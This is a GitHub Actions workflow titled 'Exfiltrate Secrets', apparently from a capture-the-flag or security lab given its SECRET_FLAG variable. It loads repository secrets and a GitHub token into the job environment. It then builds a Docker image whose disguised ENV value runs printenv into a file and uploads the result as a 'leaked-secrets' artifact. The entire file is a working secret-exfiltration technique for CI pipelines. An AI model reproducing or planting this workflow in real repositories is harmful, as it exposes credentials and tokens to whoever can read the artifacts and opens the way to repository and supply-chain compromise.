name: Exfiltrate Secrets

on:
  push:
    branches:
      - main

jobs:
  leak:
    runs-on: ubuntu-latest
    env:
      SECRET_FLAG: ${{ secrets.SECRET_FLAG }}
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Set up Dockerfile exfil
        run: |
          echo 'FROM alpine' > Dockerfile
          echo 'ENV PYTHON_VERSION="sh -c '\''echo [ENV]: > /leaks.txt && printenv >> /leaks.txt'\''"' >> Dockerfile
          echo 'RUN /bin/sh -c "$PYTHON_VERSION"' >> Dockerfile

      - name: Build image
        run: docker build -t exfil .

      - name: Run container and dump leaks.txt
        run: docker run --rm exfil cat /leaks.txt > leaked_env.txt

      - name: Upload exfiltrated env
        uses: actions/upload-artifact@v4
        with:
          name: leaked-secrets
          path: leaked_env.txt
